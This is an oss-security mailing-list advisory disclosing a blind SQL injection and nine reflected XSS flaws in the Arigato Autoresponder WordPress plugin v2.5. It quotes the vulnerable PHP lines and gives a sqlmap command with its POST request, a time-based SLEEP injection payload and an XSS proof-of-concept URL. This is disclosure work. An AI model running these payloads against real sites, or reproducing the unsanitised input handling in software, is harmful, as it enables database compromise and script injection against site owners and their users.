'[oss-security] Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Ar'

[prev in list] [next in list] [prev in thread] [next in thread] 

List:       oss-security
Subject:    [oss-security] Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin Ar
From:       "Larry W. Cashdollar" <larry0 () me ! com>
Date:       2018-09-11 12:13:56
Message-ID: 655E4F0A-B5AF-4F71-8D64-5665973B76C0 () me ! com
[Download RAW message or body]


Title: Blind SQL injection and multiple reflected XSS vulnerabilities in Wordpress Plugin \
                Arigato Autoresponder and Newsletter v2.5
Author: Larry W. Cashdollar, @_larry0
Date: 2018-08-22
CVE-IDs:[CVE-2018-1002000][CVE-2018-1002001][CVE-2018-1002002][CVE-2018-1002003][CVE-2018-100200 \
4][CVE-2018-1002005][CVE-2018-1002006][CVE-2018-1002007][CVE-2018-1002008][CVE-2018-1002009] \
                Download Site: https://wordpress.org/plugins/bft-autoresponder/
Vendor: Kiboko Labs https://calendarscripts.info/
Vendor Notified: 2018-08-22, Fixed v2.5.1.5
Vendor Contact: @prasunsen wordpress.org
Advisory: http://www.vapidlabs.com/advisory.php?v=203
Description: This plugin allows scheduling of automated autoresponder messages and newsletters, \
and managing a mailing list.  You can add/edit/delete and import/export members. There is also \
a registration form which can be placed in any website or blog. You can schedule unlimited \
number of email messages. Messages can be sent on defined number of days after user \
registration, or on a fixed date. Vulnerability:
These vulnerabilities require administrative priveledges to exploit.

CVE-2018-1002000

There is an exploitable blind SQL injection vulnerability via the del_ids variable by POST \
request. 

In line 69 of file controllers/list.php:

65 $wpdb->query("DELETE FROM ".BFT_USERS." WHERE id IN (".$_POST['del_ids'].")");

del_ids is not sanitized properly.

Nine Reflected XSS.

CVE-2018-1002001

In line 22-23 of controllers/list.php:

22 $url = "admin.php?page=bft_list&offset=".$_GET['offset']."&ob=".$_GET['ob'];
23 echo "<meta http-equiv='refresh' content='0;url=$url' />";

CVE-2018-1002002

bft_list.html.php:28: 
<div><label><?php _e('Filter by email', 'broadfast')?>:</label> <input type="text" \
name="filter_email" value="<?php echo @$_GET['filter_email']?>"></div>

CVE-2018-1002003

bft_list.html.php:29: 
<div><label><?php _e('Filter by name', 'broadfast')?>:</label> <input type="text" \
name="filter_name" value="<?php echo @$_GET['filter_name']?>"></div>

CVE-2018-1002004

bft_list.html.php:42: 
<input type="text" class="bftDatePicker" name="sdate" id="bftSignupDate" value="<?php echo \
empty($_GET['sdate']) ? '' : $_GET['sdate']?>">

CVE-2018-1002005

bft_list.html.php:43: 
<input type="hidden" name="filter_signup_date" value="<?php echo \
empty($_GET['filter_signup_date']) ? '' : $_GET['filter_signup_date']?>" \
id="alt_bftSignupDate"></div>

CVE-2018-1002006

integration-contact-form.html.php:14: 
<p><label><?php _e('CSS classes (optional):', 'broadfast')?></label> <input type="text" \
name="classes" value="<?php echo @$_POST['classes']?>"></p>

CVE-2018-1002007

integration-contact-form.html.php:15: 
<p><label><?php _e('HTML ID (optional):', 'broadfast')?></label> <input type="text" \
name="html_id" value="<?php echo @$_POST['html_id']?>"></p>

CVE-2018-1002008

list-user.html.php:4: 
<p><a href="admin.php?page=bft_list&ob=<?php echo $_GET['ob']?>&offset=<?php echo \
$_GET['offset']?>"><?php _e('Back to all subscribers', 'broadfast');?></a></p>

CVE-2018-1002009

unsubscribe.html.php:3: 
<p><input type="text" name="email" value="<?php echo @$_GET['email']?>"></p>

Exploit Code:
SQL Injection CVE-2018-1002000
$ sqlmap --load-cookies=./cook -r post_data --level 2 --dbms=mysql

Where post_data is:

POST /wp-admin/admin.php?page=bft_list&ob=email&offset=0 HTTP/1.1
Host: example.com
Connection: keep-alive
Content-Length: 150
Cache-Control: max-age=0
Origin: http://example.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like \
                Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://example.com/wp-admin/admin.php?page=bft_list&ob=email&offset=0
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: wordpress_XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

mass_delete=1&del_ids=*&_wpnonce=aa7aa407db&_wp_http_referer=%2Fwp-admin%2Fadmin.php%3Fpage%3Dbft_list%26ob%3Demail%26offset%3D0[!http]



(custom) POST parameter '#1*' is vulnerable. Do you want to keep testing the others (if any)? \
[y/N]  sqlmap identified the following injection point(s) with a total of 300 HTTP(s) requests:
---
Parameter: #1* ((custom) POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 time-based blind - Parameter replace
Payload: mass_delete=1&del_ids=(CASE WHEN (6612=6612) THEN SLEEP(5) ELSE 6612 \
END)&_wpnonce=aa7aa407db&_wp_http_referer=/wp-admin/admin.php?page=bft_list%26ob=email%26offset=0[!http]
                
---
[11:50:08] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 8.0 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.12
[11:50:08] [INFO] fetched data logged to text files under \
'/home/larry/.sqlmap/output/192.168.0.47'

[*] shutting down at 11:50:08


CVE-2018-1002001

http://example.com/wp-admin/admin.php?page=bft_list&action=edit&id=12&ob=XSS&offset=XSS

 

 



[prev in list] [next in list] [prev in thread] [next in thread]
Configure | About | News | Add a list | Sponsored by KoreLogic